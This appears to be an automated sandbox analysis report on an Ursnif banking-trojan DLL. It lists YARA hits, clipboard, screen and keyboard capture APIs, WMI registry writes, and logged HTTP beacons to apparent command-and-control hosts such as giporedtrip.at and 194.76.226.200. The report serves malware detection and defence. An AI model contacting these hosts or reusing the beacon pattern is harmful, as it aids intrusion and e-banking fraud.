                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dllString found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
                      Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dllString found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp
                      Source: unknownDNS traffic detected: queries for: giporedtrip.at
                      Source: global trafficHTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
                      Source: global trafficHTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
                      Source: global trafficHTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
                      Source: global trafficHTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
                      Source: global trafficHTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
                      Source: global trafficHTTP traffic detected: GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
                      Source: global trafficHTTP traffic detected: GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
                      Source: global trafficHTTP traffic detected: GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E57B64 GetKeyboardState,

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Writes or reads registry keys via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMI
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: hFGZpat9Mf.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007284AC CheckMenuItem,ExitWindowsEx,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0076B448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E7B448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E41FAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01082244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00ED17C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 007064B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00706408 appears 48 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00704068 appears 47 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00E16408 appears 48 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00E164B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A41C NtdllDefWindowProc_A,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E3A41C NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01082465 NtQueryVirtualMemory,
                      Source: hFGZpat9Mf.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
